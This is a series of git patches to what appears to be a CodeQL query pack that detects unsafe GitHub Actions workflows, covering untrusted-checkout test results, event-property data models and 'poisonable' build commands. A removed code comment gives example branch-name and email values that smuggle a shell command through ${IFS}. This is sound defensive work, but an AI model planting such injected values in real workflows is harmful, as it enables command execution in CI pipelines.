| Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -242,6 +294,12 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | @@ -261,5 +319,7 @@ edges | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 5bf0e56e1b77..61c328b7011d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,7 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 4aba07074c8b17e9a276216911475eb27749d57c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:45:13 +0200 Subject: [PATCH 353/707] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 847a7b83e541..5369af754891 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.5 +version: 0.1.6 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index be2b4e428c98..a019dd6f6959 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.5 +version: 0.1.6 groups: [actions, queries] suites: codeql-suites extractor: javascript From 5997038923a8d7b0d36c175f569974f576aad4f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:07:02 +0200 Subject: [PATCH 354/707] Exclude self-hosted query from CodeScanning suite --- ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 621b7fb050db..b32fe4068772 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -9,6 +9,8 @@ * @tags actions * security * external/cwe/cwe-284 + * testing + * experimental */ import codeql.actions.security.SelfHostedQuery From d11c15dc287049b8afec4c6c0d10a163d9739c04 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:07:55 +0200 Subject: [PATCH 355/707] Bump qlpack versionsi --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5369af754891..b2b92e45e7af 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.6 +version: 0.1.7 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a019dd6f6959..899f62cf9ba4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.6 +version: 0.1.7 groups: [actions, queries] suites: codeql-suites extractor: javascript From eeba26a647b5d8d7a2c6f316f159ecccac87711d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 11:55:21 +0200 Subject: [PATCH 356/707] fix typos --- ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 2 +- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index b71b3cbba99e..9f7f3fd8ceef 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind path-problem diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 9faab24dbcbe..980560dac9a3 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 574c2d7bffe9..89d2e7413067 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * @description Privileged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem From 4516d3df812d065888e374a1662cf9b3e6d6a8d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:09:49 +0200 Subject: [PATCH 357/707] Bump qlpack versions --- ql/lib/codeql-pack.lock.yml | 12 ++++++------ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 12 ++++++------ ql/test/codeql-pack.lock.yml | 12 ++++++------ 4 files changed, 22 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6ca..21e0b8bb0e91 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b2b92e45e7af..5f3825a91577 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: github/actions-all version: 0.1.7 dependencies: - codeql/util: ^1.0.0 - codeql/yaml: ^1.0.0 - codeql/controlflow: ^1.0.0 - codeql/dataflow: ^1.0.0 + codeql/util: ^1.0.1 + codeql/yaml: ^1.0.1 + codeql/controlflow: ^1.0.1 + codeql/dataflow: ^1.0.1 extractor: javascript groups: javascript dataExtensions: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6ca..21e0b8bb0e91 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6ca..21e0b8bb0e91 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false From a99d293309942f7879d670ba8c10645e54820fb8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:33:45 +0200 Subject: [PATCH 358/707] Bump to dataflow version 1.0.1 --- .../actions/dataflow/internal/DataFlowPrivate.qll | 10 ++++++++++ ql/lib/qlpack.yml | 1 + ql/{src => lib}/semmlecode.javascript.dbscheme | 0 ql/{src => lib}/semmlecode.javascript.dbscheme.stats | 0 ql/src/qlpack.yml | 1 - 5 files changed, 11 insertions(+), 1 deletion(-) rename ql/{src => lib}/semmlecode.javascript.dbscheme (100%) rename ql/{src => lib}/semmlecode.javascript.dbscheme.stats (100%) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 17b29f57025c..ec889f19205a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -84,6 +84,11 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a best-effort total ordering. */ int totalorder() { none() } + + /** Gets the location of this call. */ + Location getLocation() { + result = this.getLocation() + } } /** @@ -113,6 +118,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } + + /** Gets the location of this callable. */ + Location getLocation() { + result = this.getLocation() + } } newtype TReturnKind = TNormalReturn() diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5f3825a91577..3c37e64b8567 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -9,6 +9,7 @@ dependencies: codeql/controlflow: ^1.0.1 codeql/dataflow: ^1.0.1 extractor: javascript +dbscheme: semmlecode.javascript.dbscheme groups: javascript dataExtensions: - ext/manual/*.model.yml diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme similarity index 100% rename from ql/src/semmlecode.javascript.dbscheme rename to ql/lib/semmlecode.javascript.dbscheme diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats similarity index 100% rename from ql/src/semmlecode.javascript.dbscheme.stats rename to ql/lib/semmlecode.javascript.dbscheme.stats diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 899f62cf9ba4..f7464c784529 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -5,7 +5,6 @@ version: 0.1.7 groups: [actions, queries] suites: codeql-suites extractor: javascript -dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: github/actions-all: ${workspace} From d998373162cd1660881a14b3feac29da1efac113 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:08:40 +0200 Subject: [PATCH 359/707] Move event sources to config files --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 154 +----------------- .../ext/config/untrusted_event_properties.yml | 83 ++++++++++ 4 files changed, 103 insertions(+), 149 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_event_properties.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index d6a85c426c68..dd63fda93d1d 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -72,3 +72,13 @@ predicate poisonableLocalScriptsDataModel(string regexp, int group) { predicate poisonableActionsDataModel(string action) { Extensions::poisonableActionsDataModel(action) } + +/** + * MaD models for for event properties that can be user-controlled. + * Fields: + * - property: event property + * - kind: property kind + */ +predicate untrustedEventPropertiesDataModel(string property, string kind) { + Extensions::untrustedEventPropertiesDataModel(property, kind) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 3ca4b6a75593..26e77ce7235f 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -39,3 +39,8 @@ extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); */ extensible predicate poisonableActionsDataModel(string action); +/** + * Holds for event properties that can be user-controlled. + */ +extensible predicate untrustedEventPropertiesDataModel(string property, string kind); + diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b09664359abc..79934ca586bf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -20,136 +20,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private string titleEvent() { - result = - [ - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", - ] -} - -private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } - -private string textEvent() { - result = - [ - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] -} - -private string branchEvent() { - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. - // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . - // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - result = - [ - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] -} - -private string labelEvent() { - // - They cannot contain a escaping \ - result = ["github\\.event\\.pull_request\\.head\\.label",] -} - -private string emailEvent() { - // `echo${IFS}hello`@domain.com - result = - [ - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] -} - -private string usernameEvent() { - // All characters must be either a hyphen (-) or alphanumeric - result = - [ - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] -} - -private string pathEvent() { - result = - [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] -} - -private string jsonEvent() { - result = - [ - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - "github\\.event\\.workflow_run\\.pull_requests", - ] - or - result = titleEvent() - or - result = urlEvent() - or - result = textEvent() - or - result = branchEvent() - or - result = labelEvent() - or - result = emailEvent() - or - result = usernameEvent() - or - result = pathEvent() -} - class GitHubCtxSource extends RemoteFlowSource { string flag; @@ -184,23 +54,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { or exists(e.getEnclosingCompositeAction()) ) and - ( - regexp = titleEvent() and flag = "title" - or - regexp = urlEvent() and flag = "url" - or - regexp = textEvent() and flag = "text" - or - regexp = branchEvent() and flag = "branch" - or - regexp = labelEvent() and flag = "label" - or - regexp = emailEvent() and flag = "email" - or - regexp = usernameEvent() and flag = "username" - or - regexp = pathEvent() and flag = "filename" - ) and + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } @@ -212,9 +67,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { string flag; GitHubEventJsonSource() { - exists(Expression e, string context | + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` @@ -223,7 +79,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or // github.event is taintes for all triggers contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml new file mode 100644 index 000000000000..739544455da7 --- /dev/null +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -0,0 +1,83 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedEventPropertiesDataModel + data: + # TITLE + - ["github\\.event\\.issue\\.title", "title"] + - ["github\\.event\\.pull_request\\.title", "title"] + - ["github\\.event\\.discussion\\.title", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] + - ["github\\.event\\.workflow_run\\.display_title", "title"] + # URL + - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] + # TEXT + - ["github\\.event\\.issue\\.body", "text"] + - ["github\\.event\\.pull_request\\.body", "text"] + - ["github\\.event\\.discussion\\.body", "text"] + - ["github\\.event\\.review\\.body", "text"] + - ["github\\.event\\.comment\\.body", "text"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.message", "text"] + - ["github\\.event\\.head_commit\\.message", "text"] + - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] + - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] + - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] + - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] + - ["github\\.event\\.client_payload", "text"] + # BRANCH + - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] + - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] + - ["github\\.event\\.workflow_run\\.head_branch", "branch"] + - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] + - ["github\\.event\\.merge_group\\.head_ref", "branch"] + # LABEL + - ["github\\.event\\.pull_request\\.head\\.label", "label"] + # EMAIL + - ["github\\.event\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.head_commit\\.committer\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", "email"] + - ["github\\.event\\.merge_group\\.committer\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "email"] + # USERNAME + - ["github\\.event\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.head_commit\\.committer\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", "username"] + - ["github\\.event\\.merge_group\\.committer\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "username"] + # PATH + - ["github\\.event\\.workflow\\.path", "path"] + - ["github\\.event\\.workflow_run\\.path", "path"] + - ["github\\.event\\.workflow_run\\.referenced_workflows\\.path", "path"] + # JSON + - ["github", "json"] + - ["github\\.event", "json"] + - ["github\\.event\\.client_payload", "json"] + - ["github\\.event\\.comment", "json"] + - ["github\\.event\\.commits", "json"] + - ["github\\.event\\.discussion", "json"] + - ["github\\.event\\.head_commit", "json"] + - ["github\\.event\\.head_commit\\.author", "json"] + - ["github\\.event\\.head_commit\\.committer", "json"] + - ["github\\.event\\.issue", "json"] + - ["github\\.event\\.merge_group", "json"] + - ["github\\.event\\.merge_group\\.committer", "json"] + - ["github\\.event\\.pull_request", "json"] + - ["github\\.event\\.pull_request\\.head", "json"] + - ["github\\.event\\.pull_request\\.head\\.repo", "json"] + - ["github\\.event\\.pages", "json"] + - ["github\\.event\\.review", "json"] + - ["github\\.event\\.workflow", "json"] + - ["github\\.event\\.workflow_run", "json"] + - ["github\\.event\\.workflow_run\\.head_branch", "json"] + - ["github\\.event\\.workflow_run\\.head_commit", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] + - ["github\\.event\\.workflow_run\\.head_repository", "json"] + - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + + From 682236e432e97cef2d7af4b6892d2c2ba7887c08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:25:55 +0200 Subject: [PATCH 360/707] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 39 +++++++++++++++----------- 1 file changed, 23 insertions(+), 16 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9a9af08872c8..9ad251007e57 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -17,29 +17,36 @@ extensions: # source: https://boostsecurityio.github.io/lotp/ data: - ["ant "] - - ["bundle install"] - - ["bundle exec "] + - ["bundle "] - ["cargo "] + - ["checkov "] + - ["eslint "] - ["go generate"] + - ["go run"] - ["gomplate "] - ["gradle "] - - ["java -jar "] + - ["java -jar"] - ["make "] - - ["mkdocs build"] - - ["msbuild "] - - ["mvn "] - - ["npm i(nstall)?(\\b|$)"] - - ["npm run "] - - ["npm ci(\\b|$)"] - - ["pip install -r "] + - ["mkdocs"] + - ["msbuild"] + - ["mvn"] + - ["mypy"] + - ["npm i(nstall)?"] + - ["npm run"] + - ["npm ci"] + - ["pre-commit"] + - ["prettier"] + - ["pip install -r"] - ["pip install --requirement"] - - ["poetry install"] - - ["poetry run"] - - ["pre-commit run"] - - ["pre-commit install"] + - ["poetry"] + - ["pylint"] - ["pytest"] - - ["terraform plan"] - - ["terraform apply"] + - ["rake "] + - ["rails db:create"] + - ["rails assets:precompile"] + - ["rubocop "] + - ["terraform "] + - ["tflint"] - ["yarn "] - addsTo: pack: github/actions-all From 04c4cedb41a55c7455a021ae69835c680576e717 Mon Sep 17 00:00:00 2001 From: 